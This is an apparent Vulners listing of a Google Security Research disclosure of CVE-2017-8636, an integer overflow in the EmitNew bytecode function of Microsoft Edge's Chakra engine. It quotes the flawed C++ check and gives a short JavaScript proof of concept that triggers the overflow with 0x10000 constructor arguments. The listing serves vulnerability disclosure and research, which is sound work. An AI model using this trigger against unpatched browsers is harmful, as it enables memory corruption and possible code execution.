Vulners
Lucene search
Microsoft Edge Chakra EmitNew Integer Overflow
🗓️ 17 Aug 2017 00:00:00Reported by Google Security ResearchType 
packetstorm🔗 packetstormsecurity.com👁 43 Views
| Reporter | Title | Published | Views | Family All 63 |
|---|---|---|---|---|
 | Microsoft Edge Chakra EmitNew Integer Overflow Exploit | 17 Aug 201700:00 | – | zdt |
| Microsoft Edge Chakra - Heap Buffer Overflow Exploit | 18 Aug 201700:00 | – | zdt |
| Microsoft Edge Chakra - NULL Pointer Dereference Exploit | 18 Aug 201700:00 | – | zdt |
| Microsoft Edge Chakra - Buffer Overflow Exploit | 18 Aug 201700:00 | – | zdt |
 | Vulnerability of the JavaScript kernel in Microsoft Edge and Internet Explorer browsers, allowing attackers to execute arbitrary code | 25 Aug 201700:00 | – | bdu_fstec |
 | CVE-2017-8636 | 17 Aug 201700:00 | – | circl |
 | Microsoft Windows Internet Explorer and Edge JavaScript Engine Remote Code Execution Vulnerability | 9 Aug 201700:00 | – | cnvd |
 | Microsoft Browser Scripting Engine Memory Corruption (CVE-2017-8636) | 28 Aug 201700:00 | – | checkpoint_advisories |
 | CVE-2017-8636 | 8 Aug 201721:00 | – | cve |
 | CVE-2017-8636 | 8 Aug 201721:00 | – | cvelist |
10
` Microsoft Edge: Chakra: Integer overflow in EmitNew
CVE-2017-8636
The bytecode generator uses the "EmitNew" function to handle new operators.
Here's the code how the function checks for integer overflow.
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
Js::ArgSlot argCount = pnode->sxCall.argCount;
argCount++; // include "this"
BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);
if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
...
}
"Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.
PoC:
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2017 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.81659